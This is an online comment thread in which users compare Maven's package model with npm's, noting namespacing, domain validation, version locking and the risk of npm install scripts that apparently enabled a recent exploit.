| ▲ | JD557 4 hours ago | |||||||
I have a similar opinion but I think Java's model with maven and friends hits the sweet spot: - Packages are always namespaced, so typosquating is harder - Registries like Sonatype require you to validate your domain - Versions are usually locked by default My professional life has been tied to JVM languages, though, so I might be a bit biased. I get that there are some issues with the model, especially when it comes to eviction, but it has been "good enough" for me. Curious on what other people think about it. | ||||||||
| ▲ | oftenwrong 3 hours ago | parent [-] | |||||||
Maven does not support "scripts" as NPM does, such as the pre-install script used for this exploit. With scripts enabled, the mere act of downloading a dependency requires a high degree of trust in it. | ||||||||
| ||||||||